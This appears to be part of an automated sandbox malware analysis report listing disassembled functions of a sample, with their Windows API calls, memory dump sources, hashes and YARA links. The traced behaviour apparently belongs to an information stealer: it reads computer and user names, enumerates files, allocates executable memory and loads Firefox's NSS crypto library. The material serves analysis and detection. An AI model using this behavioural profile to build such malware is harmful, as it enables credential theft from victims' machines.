                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2500673778-0
                                                                                                                                              • Opcode ID: 0657cb1554229368ef345c3e942b6cbc350a0a001ae439f0d73e17557e85f9c1
                                                                                                                                              • Instruction ID: b118e420acb74f1bad9678fc0f4fca3608bd39bb9752133bd9c886ddfd0b535b
                                                                                                                                              • Opcode Fuzzy Hash: 0657cb1554229368ef345c3e942b6cbc350a0a001ae439f0d73e17557e85f9c1
                                                                                                                                              • Instruction Fuzzy Hash: A8916672A151089BCB04FBA1DC66DEE7339AF14314F40456FF10663195EF387A98CB6A
                                                                                                                                              Function 0040B200 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040B3FE
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040B412
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2500673778-0
                                                                                                                                              • Opcode ID: 33e48775dcb1ffea5c6fe80090a01f37aa27f728cae148071cfa4d02d457d983
                                                                                                                                              • Instruction ID: df39fec182a976cf14ea74314fd1cc2d61bc45c83f0c5b543270b10835f39725
                                                                                                                                              • Opcode Fuzzy Hash: 33e48775dcb1ffea5c6fe80090a01f37aa27f728cae148071cfa4d02d457d983
                                                                                                                                              • Instruction Fuzzy Hash: B4715271A111089BCB04FBA1DCA6DEE733AAF14314F40456FF50267195EF387A58CBAA
                                                                                                                                              Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
                                                                                                                                              • Instruction ID: 1e55e6aee22da07579867dcc14e26085db0c1923c06382e7ddd462ac09197dec
                                                                                                                                              • Opcode Fuzzy Hash: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
                                                                                                                                              • Instruction Fuzzy Hash: 6041D474A00209EFCB54CF58C494BADBBB1FF44314F1486A9E949AB385D735EA91CF84
                                                                                                                                              Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                                                                                                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                              • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                                                                                                                              • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                                                                                                                              • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                                                                                                                              • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                                                                                                                              Function 00418F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: e4e61478786545620c941bfdebde28148ee30d40bfd2ffe50c48c5d67029bfc3
                                                                                                                                              • Instruction ID: 622f2f336d6b1c39152e8ed1c6124f6159486e78b27092244718ebba6cc61b65
                                                                                                                                              • Opcode Fuzzy Hash: e4e61478786545620c941bfdebde28148ee30d40bfd2ffe50c48c5d67029bfc3
                                                                                                                                              • Instruction Fuzzy Hash: 7EF01C70D0520CEBCB00EF94D4496DDBB75EB00324F10819AE82967280DB385B96CB89
                                                                                                                                              Function 00418F70 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                              • Opcode ID: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
                                                                                                                                              • Instruction ID: e79076dc3140f9edc5567924fb21932d6a0b2d79ef3805787682db2ce51b8011
                                                                                                                                              • Opcode Fuzzy Hash: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
                                                                                                                                              • Instruction Fuzzy Hash: 92E0127194434C6BDB51DB50CC96FDD776D9B44B11F004295BA0C5B1C0DE70AB858B95
                                                                                                                                              Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004011C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1004333139-0
                                                                                                                                              • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                                                                                                                              • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                                                                                                                              • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                                                                                                                              • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                                                                                                                              Function 00409910 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,004108B9,?,?), ref: 00409918
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                              • Opcode ID: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
                                                                                                                                              • Instruction ID: 7a81cf42230454625edcc1d807e760a9f48c6c1e1b7ee97c20b10c4417f739aa
                                                                                                                                              • Opcode Fuzzy Hash: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
                                                                                                                                              • Instruction Fuzzy Hash: F3F054B4D00208FBDB00EFA5C846B9EBBB49B08304F1085A9F905A7381E674AB14CB95

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 6C726D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(?,6C82A8EC,0000006C), ref: 6C726DC6
                                                                                                                                              • memcpy.VCRUNTIME140(?,6C82A958,0000006C), ref: 6C726DDB
                                                                                                                                              • memcpy.VCRUNTIME140(?,6C82A9C4,00000078), ref: 6C726DF1
                                                                                                                                              • memcpy.VCRUNTIME140(?,6C82AA3C,0000006C), ref: 6C726E06
                                                                                                                                              • memcpy.VCRUNTIME140(?,6C82AAA8,00000060), ref: 6C726E1C
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C726E38
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6C726E76
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C72726F
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C727283
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 3333340300-2657877971
                                                                                                                                              • Opcode ID: 72e58256691988ec191dba9f1a498a18e636138d959090808b27effc78906038
                                                                                                                                              • Instruction ID: 512dfa35c74aac523b0f8e05f6ecf2b25de75e24c052738aa3887085aa7674c5
                                                                                                                                              • Opcode Fuzzy Hash: 72e58256691988ec191dba9f1a498a18e636138d959090808b27effc78906038
                                                                                                                                              • Instruction Fuzzy Hash: 14729E75D052199FDF60DF28CE8879ABBB5BF49308F1041A9D80DA7701E735AA84CF91
                                                                                                                                              Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • wsprintfA.USER32 ref: 00413B1C
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                                                                                                                              • API String ID: 1125553467-4052298153
                                                                                                                                              • Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                                                                                                                              • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                                                                                                                              • Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                                                                                                                              • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                                                                                                                              Function 6C693C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693C66
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C693D04
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693EAD
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693ED7
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693F74
